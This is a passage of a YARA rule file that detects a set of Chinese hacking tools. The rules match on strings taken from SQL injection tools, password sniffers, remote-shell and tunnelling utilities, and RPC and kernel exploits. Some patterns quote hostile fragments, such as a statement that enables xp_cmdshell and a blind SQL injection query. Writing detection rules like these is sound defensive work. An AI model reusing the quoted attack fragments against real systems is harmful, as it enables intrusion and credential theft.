  meta:
    description = "Chinese Hacktool Set - file Down32.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "0365738acd728021b0ea2967c867f1014fd7dd75"
  strings:
    $s2 = "C:\\Windows\\Temp\\Cmd.txt" wide fullword
    $s6 = "down.exe" wide fullword
    $s15 = "get_Form1" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 140288 and all of them
}

rule MarathonTool_2 {
  meta:
    description = "Chinese Hacktool Set - file MarathonTool.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "75b5d25cdaa6a035981e5a33198fef0117c27c9c"
  strings:
    $s3 = "http://localhost/retomysql/pista.aspx?id_pista=1" wide fullword
    $s6 = "SELECT ASCII(SUBSTR(username,{0},1)) FROM USER_USERS" wide fullword
    $s17 = "/Blind SQL injection tool based in heavy queries" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 1024000 and all of them
}

rule Tools_termsrv {
  meta:
    description = "Chinese Hacktool Set - file termsrv.dll"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "294a693d252f8f4c85ad92ee8c618cebd94ef247"
  strings:
    $s1 = "Iv\\SmSsWinStationApiPort" ascii fullword
    $s2 = " TSInternetUser " wide fullword
    $s3 = "KvInterlockedCompareExchange" ascii fullword
    $s4 = " WINS/DNS " wide fullword
    $s5 = "winerror=%1" wide fullword
    $s6 = "TermService " wide fullword
  condition:
    uint16(0) == 23117 and filesize < 1177600 and all of them
}

rule scanms_scanms {
  meta:
    description = "Chinese Hacktool Set - file scanms.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "47787dee6ddea2cb44ff27b6a5fd729273cea51a"
  strings:
    $s1 = "--- ScanMs Tool --- (c) 2003 Internet Security Systems ---" ascii fullword
    $s2 = "Scans for systems vulnerable to MS03-026 vuln" ascii fullword
    $s3 = "More accurate for WinXP/Win2k, less accurate for WinNT" ascii fullword
    $s4 = "added %d.%d.%d.%d-%d.%d.%d.%d" ascii fullword
    $s5 = "Internet Explorer 1.0" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 307200 and 3 of them
}

rule CN_Tools_PcShare {
  meta:
    description = "Chinese Hacktool Set - file PcShare.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "ee7ba9784fae413d644cdf5a093bd93b73537652"
  strings:
    $s0 = "title=%s%s-%s;id=%s;hwnd=%d;mainhwnd=%d;mainprocess=%d;cmd=%d;" wide fullword
    $s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" wide fullword
    $s2 = "http://www.pcshares.cn/pcshare200/lostpass.asp" wide fullword
    $s5 = "port=%s;name=%s;pass=%s;" wide fullword
    $s16 = "%s\\ini\\*.dat" wide fullword
    $s17 = "pcinit.exe" wide fullword
    $s18 = "http://www.pcshare.cn" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 6144000 and 3 of them
}

rule pw_inspector {
  meta:
    description = "Chinese Hacktool Set - file pw-inspector.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "4f8e3e101098fc3da65ed06117b3cb73c0a66215"
  strings:
    $s1 = "-m MINLEN  minimum length of a valid password" ascii fullword
    $s2 = "http://www.thc.org" ascii fullword
    $s3 = "Use for hacking: trim your dictionary file to the pw requirements of the target." ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 471040 and all of them
}

rule Dll_LoadEx {
  meta:
    description = "Chinese Hacktool Set - file Dll_LoadEx.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "213d9d0afb22fe723ff570cf69ff8cdb33ada150"
  strings:
    $s0 = "WiNrOOt@126.com" wide fullword
    $s1 = "Dll_LoadEx.EXE" wide fullword
    $s3 = "You Already Loaded This DLL ! :(" ascii fullword
    $s10 = "Dll_LoadEx Microsoft " wide fullword
    $s17 = "Can't Load This Dll ! :(" ascii fullword
    $s18 = "WiNrOOt" wide fullword
    $s20 = " Dll_LoadEx(&A)..." wide fullword
  condition:
    uint16(0) == 23117 and filesize < 122880 and 3 of them
}

rule dat_report {
  meta:
    description = "Chinese Hacktool Set - file report.dll"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "4582a7c1d499bb96dad8e9b227e9d5de9becdfc2"
  strings:
    $s1 = "<a href=\"http://www.xfocus.net\">X-Scan</a>" ascii fullword
    $s2 = "REPORT-ANALYSIS-OF-HOST" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 491520 and all of them
}

rule Dos_iis7 {
  meta:
    description = "Chinese Hacktool Set - file iis7.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "0a173c5ece2fd4ac8ecf9510e48e95f43ab68978"
  strings:
    $s0 = "\\\\localhost" ascii fullword
    $s1 = "iis.run" ascii fullword
    $s3 = ">Could not connecto %s" ascii fullword
    $s5 = "WHOAMI" ascii
    $s13 = "WinSta0\\Default" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 143360 and all of them
}

rule SwitchSniffer {
  meta:
    description = "Chinese Hacktool Set - file SwitchSniffer.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "1e7507162154f67dff4417f1f5d18b4ade5cf0cd"
  strings:
    $s0 = "NextSecurity.NET" wide fullword
    $s2 = "SwitchSniffer Setup" wide fullword
  condition:
    uint16(0) == 23117 and all of them
}

rule dbexpora {
  meta:
    description = "Chinese Hacktool Set - file dbexpora.dll"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "b55b007ef091b2f33f7042814614564625a8c79f"
  strings:
    $s0 = "SELECT A.USER FROM SYS.USER_USERS A " ascii fullword
    $s12 = "OCI 8 - OCIDescriptorFree" ascii fullword
    $s13 = "ORACommand *" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 855040 and all of them
}

rule SQLCracker {
  meta:
    description = "Chinese Hacktool Set - file SQLCracker.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "1aa5755da1a9b050c4c49fc5c58fa133b8380410"
  strings:
    $s0 = "msvbvm60.dll" ascii fullword
    $s1 = "_CIcos" ascii fullword
    $s2 = "kernel32.dll" ascii fullword
    $s3 = "cKmhV" ascii fullword
    $s4 = "080404B0" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 128000 and all of them
}

rule FreeVersion_debug {
  meta:
    description = "Chinese Hacktool Set - file debug.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "d11e6c6f675b3be86e37e50184dadf0081506a89"
  strings:
    $s0 = "c:\\Documents and Settings\\Administrator\\" ascii fullword
    $s1 = "Got WMI process Pid: %d" ascii
    $s2 = "This exploit will execute" ascii
    $s6 = "Found token %s " ascii
    $s7 = "Running reverse shell" ascii
    $s10 = "wmiprvse.exe" ascii fullword
    $s12 = "SELECT * FROM IIsWebInfo" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 839680 and 3 of them
}

rule Dos_look {
  meta:
    description = "Chinese Hacktool Set - file look.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "e1a37f31170e812185cf00a838835ee59b8f64ba"
  strings:
    $s1 = "<description>CHKen QQ:41901298</description>" ascii fullword
    $s2 = "version=\"9.9.9.9\"" ascii fullword
    $s3 = "name=\"CH.Ken.Tool\"" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 40960 and all of them
}

rule NtGodMode {
  meta:
    description = "Chinese Hacktool Set - file NtGodMode.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "8baac735e37523d28fdb6e736d03c67274f7db77"
  strings:
    $s0 = "to HOST!" ascii fullword
    $s1 = "SS.EXE" ascii fullword
    $s5 = "lstrlen0" ascii fullword
    $s6 = "Virtual" ascii fullword
    $s19 = "RtlUnw" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 46080 and all of them
}

rule Dos_NC {
  meta:
    description = "Chinese Hacktool Set - file NC.EXE"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "57f0839433234285cc9df96198a6ca58248a4707"
  strings:
    $s1 = "nc -l -p port [options] [hostname] [port]" ascii fullword
    $s2 = "invalid connection to [%s] from %s [%s] %d" ascii fullword
    $s3 = "post-rcv getsockname failed" ascii fullword
    $s4 = "Failed to execute shell, error = %s" ascii fullword
    $s5 = "UDP listen needs -p arg" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 296960 and all of them
}

rule WebCrack4_RouterPasswordCracking {
  meta:
    description = "Chinese Hacktool Set - file WebCrack4-RouterPasswordCracking.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "00c68d1b1aa655dfd5bb693c13cdda9dbd34c638"
  strings:
    $s0 = "http://www.site.com/test.dll?user=%USERNAME&pass=%PASSWORD" ascii fullword
    $s1 = "Username: \"%s\", Password: \"%s\", Remarks: \"%s\"" ascii fullword
    $s14 = "user:\"%s\" pass: \"%s\" result=\"%s\"" ascii fullword
    $s16 = "Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)" ascii fullword
    $s20 = "List count out of bounds (%d)+Operation not allowed on sorted string list%String" wide
  condition:
    uint16(0) == 23117 and filesize < 5120000 and 2 of them
}

rule HScan_v1_20_oncrpc {
  meta:
    description = "Chinese Hacktool Set - file oncrpc.dll"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "e8f047eed8d4f6d2f5dbaffdd0e6e4a09c5298a2"
  strings:
    $s1 = "clnt_raw.c - Fatal header serialization error." ascii fullword
    $s2 = "svctcp_.c - cannot getsockname or listen" ascii fullword
    $s3 = "too many connections (%d), compilation constant FD_SETSIZE was only %d" ascii fullword
    $s4 = "svc_run: - select failed" ascii fullword
    $s5 = "@(#)bindresvport.c" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 348160 and 4 of them
}

rule hscan_gui {
  meta:
    description = "Chinese Hacktool Set - file hscan-gui.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "1885f0b7be87f51c304b39bc04b9423539825c69"
  strings:
    $s0 = "Hscan.EXE" wide fullword
    $s1 = "RestTool.EXE" ascii fullword
    $s3 = "Hscan Application " wide fullword
  condition:
    uint16(0) == 23117 and filesize < 563200 and all of them
}

rule S_MultiFunction_Scanners_s {
  meta:
    description = "Chinese Hacktool Set - file s.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "79b60ffa1c0f73b3c47e72118e0f600fcd86b355"
  strings:
    $s0 = "C:\\WINDOWS\\temp\\pojie.exe /l=" ascii fullword
    $s1 = "C:\\WINDOWS\\temp\\s.exe" ascii fullword
    $s2 = "C:\\WINDOWS\\temp\\s.exe tcp " ascii fullword
    $s3 = "explorer.exe http://www.hackdos.com" ascii fullword
    $s4 = "C:\\WINDOWS\\temp\\pojie.exe" ascii fullword
    $s5 = "Failed to read file or invalid data in file!" ascii fullword
    $s6 = "www.hackdos.com" ascii fullword
    $s7 = "WTNE / MADE BY E COMPILER - WUTAO " ascii fullword
    $s11 = "The interface of kernel library is invalid!" ascii fullword
    $s12 = "eventvwr" ascii fullword
    $s13 = "Failed to decompress data!" ascii fullword
    $s14 = "NOTEPAD.EXE result.txt" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 8192000 and 4 of them
}

rule Dos_GetPass {
  meta:
    description = "Chinese Hacktool Set - file GetPass.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "d18d952b24110b83abd17e042f9deee679de6a1a"
  strings:
    $s0 = "GetLogonS" ascii
    $s3 = "/showthread.php?t=156643" ascii
    $s8 = "To Run As Administ" ascii
    $s18 = "EnableDebugPrivileg" ascii fullword
    $s19 = "sedebugnameValue" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 911360 and all of them
}

rule update_PcMain {
  meta:
    description = "Chinese Hacktool Set - file PcMain.dll"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "aa68323aaec0269b0f7e697e69cce4d00a949caa"
  strings:
    $s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322" ascii
    $s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" ascii fullword
    $s2 = "SOFTWARE\\Classes\\HTTP\\shell\\open\\command" ascii fullword
    $s3 = "\\svchost.exe -k " ascii fullword
    $s4 = "SYSTEM\\ControlSet001\\Services\\%s" ascii fullword
    $s9 = "Global\\%s-key-event" ascii fullword
    $s10 = "%d%d.exe" ascii fullword
    $s14 = "%d.exe" ascii fullword
    $s15 = "Global\\%s-key-metux" ascii fullword
    $s18 = "GET / HTTP/1.1" ascii fullword
    $s19 = "\\Services\\" ascii fullword
    $s20 = "qy001id=%d;qy001guid=%s" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 512000 and 4 of them
}

rule Dos_sys {
  meta:
    description = "Chinese Hacktool Set - file sys.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "b5837047443f8bc62284a0045982aaae8bab6f18"
  strings:
    $s0 = "'SeDebugPrivilegeOpen " ascii fullword
    $s6 = "Author: Cyg07*2" ascii fullword
    $s12 = "from golds7n[LAG]'J" ascii fullword
    $s14 = "DAMAGE" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 153600 and all of them
}

rule dat_xpf {
  meta:
    description = "Chinese Hacktool Set - file xpf.sys"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "761125ab594f8dc996da4ce8ce50deba49c81846"
  strings:
    $s1 = "UnHook IoGetDeviceObjectPointer ok!" ascii fullword
    $s2 = "\\Device\\XScanPF" wide fullword
    $s3 = "\\DosDevices\\XScanPF" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 25600 and all of them
}

rule Project1 {
  meta:
    description = "Chinese Hacktool Set - file Project1.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "d1a5e3b646a16a7fcccf03759bd0f96480111c96"
  strings:
    $s1 = "EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'" ascii fullword
    $s2 = "Password.txt" ascii fullword
    $s3 = "LoginPrompt" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 5120000 and all of them
}

rule Arp_EMP_v1_0 {
  meta:
    description = "Chinese Hacktool Set - file Arp EMP v1.0.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "ae4954c142ad1552a2abaef5636c7ef68fdd99ee"
  strings:
    $s0 = "Arp EMP v1.0.exe" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 819200 and all of them
}

rule CN_Tools_MyUPnP {
  meta:
    description = "Chinese Hacktool Set - file MyUPnP.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "15b6fca7e42cd2800ba82c739552e7ffee967000"
  strings:
    $s1 = "<description>BYTELINKER.COM</description>" ascii fullword
    $s2 = "myupnp.exe" ascii fullword
    $s3 = "LOADER ERROR" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 1536000 and all of them
}

rule CN_Tools_Shiell {
  meta:
    description = "Chinese Hacktool Set - file Shiell.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "b432d80c37abe354d344b949c8730929d8f9817a"
  strings:
    $s1 = "C:\\Users\\Tong\\Documents\\Visual Studio 2012\\Projects\\Shift shell" ascii
    $s2 = "C:\\Windows\\System32\\Shiell.exe" wide fullword
    $s3 = "Shift shell.exe" wide fullword
    $s4 = "\" /v debugger /t REG_SZ /d \"" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 1536000 and 2 of them
}

rule cndcom_cndcom {
  meta:
    description = "Chinese Hacktool Set - file cndcom.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "08bbe6312342b28b43201125bd8c518531de8082"
  strings:
    $s1 = "- Rewritten by HDM last <hdm [at] metasploit.com>" ascii fullword
    $s2 = "- Usage: %s <Target ID> <Target IP>" ascii fullword
    $s3 = "- Remote DCOM RPC Buffer Overflow Exploit" ascii fullword
    $s4 = "- Warning:This Code is more like a dos tool!(Modify by pingker)" ascii fullword
    $s5 = "Windows NT SP6 (Chinese)" ascii fullword
    $s6 = "- Original code by FlashSky and Benjurry" ascii fullword
    $s7 = "\\C$\\123456111111111111111.doc" wide fullword
    $s8 = "shell3all.c" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 102400 and 2 of them
}

rule IsDebug_V1_4 {
  meta:
    description = "Chinese Hacktool Set - file IsDebug V1.4.dll"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "ca32474c358b4402421ece1cb31714fbb088b69a"
  strings:
    $s0 = "IsDebug.dll" ascii fullword
    $s1 = "SV Dumper V1.0" wide fullword
    $s2 = "(IsDebuggerPresent byte Patcher)" ascii fullword
    $s8 = "Error WriteMemory failed" ascii fullword
    $s9 = "IsDebugPresent" ascii fullword
    $s10 = "idb_Autoload" ascii fullword
    $s11 = "Bin Files" ascii fullword
    $s12 = "MASM32 version" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 30720 and all of them
}

rule HTTPSCANNER {
  meta:
    description = "Chinese Hacktool Set - file HTTPSCANNER.EXE"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "ae2929346944c1ea3411a4562e9d5e2f765d088a"
  strings:
    $s1 = "HttpScanner.exe" wide fullword
    $s2 = "HttpScanner" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 3584000 and all of them
}

rule HScan_v1_20_PipeCmd {
  meta:
    description = "Chinese Hacktool Set - file PipeCmd.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "64403ce63b28b544646a30da3be2f395788542d6"
  strings:
    $s1 = "%SystemRoot%\\system32\\PipeCmdSrv.exe" ascii fullword
    $s2 = "PipeCmd.exe" wide fullword
    $s3 = "Please Use NTCmd.exe Run This Program." ascii fullword
    $s4 = "%s\\pipe\\%s%s%d" ascii fullword
    $s5 = "\\\\.\\pipe\\%s%s%d" ascii fullword
    $s6 = "%s\\ADMIN$\\System32\\%s%s" ascii fullword
    $s7 = "This is a service executable! Couldn't start directly." ascii fullword
    $s8 = "Connecting to Remote Server ...Failed" ascii fullword
    $s9 = "PIPECMDSRV" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 204800 and 4 of them
}

rule Dos_fp {
  meta:
    description = "Chinese Hacktool Set - file fp.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c"
  strings:
    $s1 = "fpipe -l 53 -s 53 -r 80 192.168.1.101" ascii fullword
    $s2 = "FPipe.exe" wide fullword
    $s3 = "http://www.foundstone.com" ascii fullword
    $s4 = "%s %s port %d. Address is already in use" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 66560 and all of them
}

rule Dos_netstat {
  meta:
    description = "Chinese Hacktool Set - file netstat.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "d0444b7bd936b5fc490b865a604e97c22d97e598"
  strings:
    $s0 = "w03a2409.dll" ascii fullword
    $s1 = "Retransmission Timeout Algorithm    = unknown (%1!u!)" wide fullword
    $s2 = "Administrative Status  = %1!u!" wide fullword
    $s3 = "Packet Too Big            %1!-10u!  %2!-10u!" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 153600 and all of them
}

rule CN_Tools_xsniff {
  meta:
    description = "Chinese Hacktool Set - file xsniff.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "d61d7329ac74f66245a92c4505a327c85875c577"
  strings:
    $s0 = "xsiff.exe -pass -hide -log pass.log" ascii fullword
    $s1 = "HOST: %s USER: %s, PASS: %s" ascii fullword
    $s2 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" ascii fullword
    $s10 = "Code by glacier <glacier@xfocus.org>" ascii fullword
    $s11 = "%-5s%s->%s Bytes=%d TTL=%d Type: %d,%d ID=%d SEQ=%d" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 225280 and 2 of them
}

rule MSSqlPass {
  meta:
    description = "Chinese Hacktool Set - file MSSqlPass.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "172b4e31ed15d1275ac07f3acbf499daf9a055d7"
  strings:
    $s0 = "Reveals the passwords stored in the Registry by Enterprise Manager of SQL Server" wide
    $s1 = "empv.exe" wide fullword
    $s2 = "Enterprise Manager PassView" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 122880 and all of them
}

rule WSockExpert {
  meta:
    description = "Chinese Hacktool Set - file WSockExpert.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "2962bf7b0883ceda5e14b8dad86742f95b50f7bf"
  strings:
    $s1 = "OpenProcessCmdExecute!" ascii fullword
    $s2 = "http://www.hackp.com" ascii fullword
    $s3 = "'%s' is not a valid time!'%s' is not a valid date and time" wide fullword
    $s4 = "SaveSelectedFilterCmdExecute" ascii fullword
    $s5 = "PasswordChar@" ascii fullword
    $s6 = "WSockHook.DLL" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 2560000 and 4 of them
}

rule Ms_Viru_racle {
  meta:
    description = "Chinese Hacktool Set - file racle.dll"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "13116078fff5c87b56179c5438f008caf6c98ecb"
  strings:
    $s0 = "PsInitialSystemProcess @%p" ascii fullword
    $s1 = "PsLookupProcessByProcessId(%u) Failed" ascii fullword
    $s2 = "PsLookupProcessByProcessId(%u) => %p" ascii fullword
    $s3 = "FirstStage() Loaded, CurrentThread @%p Stack %p - %p" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 215040 and all of them
}

rule lamescan3 {
  meta:
    description = "Chinese Hacktool Set - file lamescan3.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "3130eefb79650dab2e323328b905e4d5d3a1d2f0"
  strings:
    $s1 = "dic\\loginlist.txt" ascii fullword
    $s2 = "Radmin.exe" ascii fullword
    $s3 = "lamescan3.pdf!" ascii fullword
    $s4 = "dic\\passlist.txt" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 3829760 and all of them
}

rule CN_Tools_pc {
  meta:
    description = "Chinese Hacktool Set - file pc.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "5cf8caba170ec461c44394f4058669d225a94285"
  strings:
    $s0 = "\\svchost.exe" ascii fullword
    $s2 = "%s%08x.001" ascii fullword
    $s3 = "Qy001Service" ascii fullword
    $s4 = "/.MIKY" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 307200 and all of them
}

rule Dos_Down64 {
  meta:
    description = "Chinese Hacktool Set - file Down64.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "43e455e43b49b953e17a5b885ffdcdf8b6b23226"
  strings:
    $s1 = "C:\\Windows\\Temp\\Down.txt" wide fullword
    $s2 = "C:\\Windows\\Temp\\Cmd.txt" wide fullword
    $s3 = "C:\\Windows\\Temp\\" wide fullword
    $s4 = "ProcessXElement" ascii fullword
    $s8 = "down.exe" wide fullword
    $s20 = "set_Timer1" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 153600 and all of them
}

rule epathobj_exp32 {
  meta:
    description = "Chinese Hacktool Set - file epathobj_exp32.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "ed86ff44bddcfdd630ade8ced39b4559316195ba"
  strings:
    $s0 = "Watchdog thread %d waiting on Mutex" ascii fullword
    $s1 = "Exploit ok run command" ascii fullword
    $s2 = "\\epathobj_exp\\Release\\epathobj_exp.pdb" ascii fullword
    $s3 = "Alllocated userspace PATHRECORD () %p" ascii fullword
    $s4 = "Mutex object did not timeout, list not patched" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 276480 and all of them
}

rule Tools_unknown {
  meta:
    description = "Chinese Hacktool Set - file unknown.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "4be8270c4faa1827177e2310a00af2d5bcd2a59f"
  strings:
    $s1 = "No data to read.$Can not bind in port range (%d - %d)" wide fullword
    $s2 = "GET /ok.asp?id=1__sql__ HTTP/1.1" ascii fullword
    $s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" ascii fullword
    $s4 = "Failed to clear tab control Failed to delete tab at index %d\"Failed to retrieve" wide
    $s5 = "Host: 127.0.0.1" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 2560000 and 4 of them
}

rule PLUGIN_AJunk {
  meta:
    description = "Chinese Hacktool Set - file AJunk.dll"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "eb430fcfe6d13b14ff6baa4b3f59817c0facec00"
  strings:
    $s1 = "AJunk.dll" ascii fullword
    $s2 = "AJunk.DLL" wide fullword
    $s3 = "AJunk Dynamic Link Library" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 573440 and all of them
}

rule IISPutScanner {
  meta:
    description = "Chinese Hacktool Set - file IISPutScanner.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "9869c70d6a9ec2312c749aa17d4da362fa6e2592"
  strings:
    $s2 = "KERNEL32.DLL" ascii fullword
    $s3 = "ADVAPI32.DLL" ascii fullword
    $s4 = "VERSION.DLL" ascii fullword
    $s5 = "WSOCK32.DLL" ascii fullword
    $s6 = "COMCTL32.DLL" ascii fullword
    $s7 = "GDI32.DLL" ascii fullword
    $s8 = "SHELL32.DLL" ascii fullword
    $s9 = "USER32.DLL" ascii fullword
    $s10 = "OLEAUT32.DLL" ascii fullword
    $s11 = "LoadLibraryA" ascii fullword
    $s12 = "GetProcAddress" ascii fullword
    $s13 = "VirtualProtect" ascii fullword
    $s14 = "VirtualAlloc" ascii fullword
    $s15 = "VirtualFree" ascii fullword
    $s16 = "ExitProcess" ascii fullword
    $s17 = "RegCloseKey" ascii fullword
    $s18 = "GetFileVersionInfoA" ascii fullword
    $s19 = "ImageList_Add" ascii fullword
    $s20 = "BitBlt" ascii fullword
    $s21 = "ShellExecuteA" ascii fullword
    $s22 = "ActivateKeyboardLayout" ascii fullword
    $s23 = "BBABORT" wide fullword
    $s25 = "BBCANCEL" wide fullword
    $s26 = "BBCLOSE" wide fullword
    $s27 = "BBHELP" wide fullword
    $s28 = "BBIGNORE" wide fullword
    $s29 = "PREVIEWGLYPH" wide fullword
    $s30 = "DLGTEMPLATE" wide fullword
    $s31 = "TABOUTBOX" wide fullword
    $s32 = "TFORM1" wide fullword
    $s33 = "MAINICON" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 512000 and filesize > 358400 and all of them
}

rule IDTools_For_WinXP_IdtTool_2 {
  meta:
    description = "Chinese Hacktool Set - file IdtTool.sys"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "07feb31dd21d6f97614118b8a0adf231f8541a67"
  strings:
    $s0 = "\\Device\\devIdtTool" wide fullword
    $s1 = "IoDeleteSymbolicLink" ascii fullword
    $s3 = "IoDeleteDevice" ascii fullword
    $s6 = "IoCreateSymbolicLink" ascii fullword
    $s7 = "IoCreateDevice" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 7168 and all of them
}

rule hkmjjiis6 {
  meta:
    description = "Chinese Hacktool Set - file hkmjjiis6.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "4cbc6344c6712fa819683a4bd7b53f78ea4047d7"
  strings:
    $s1 = "comspec" ascii fullword
    $s2 = "user32.dlly" ascii
    $s3 = "runtime error" ascii
    $s4 = "WinSta0\\Defau" ascii
    $s5 = "AppIDFlags" ascii fullword
    $s6 = "GetLag" ascii fullword
    $s7 = "* FROM IIsWebInfo" ascii
    $s8 = "wmiprvse.exe" ascii
    $s9 = "LookupAcc" ascii
  condition:
    uint16(0) == 23117 and filesize < 71680 and all of them
}

rule Dos_lcx {
  meta:
    description = "Chinese Hacktool Set - file lcx.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "b6ad5dd13592160d9f052bb47b0d6a87b80a406d"
  strings:
    $s0 = "c:\\Users\\careful_snow\\" ascii
    $s1 = "Desktop\\Htran\\Release\\Htran.pdb" ascii
    $s3 = "[SERVER]connection to %s:%d error" ascii fullword
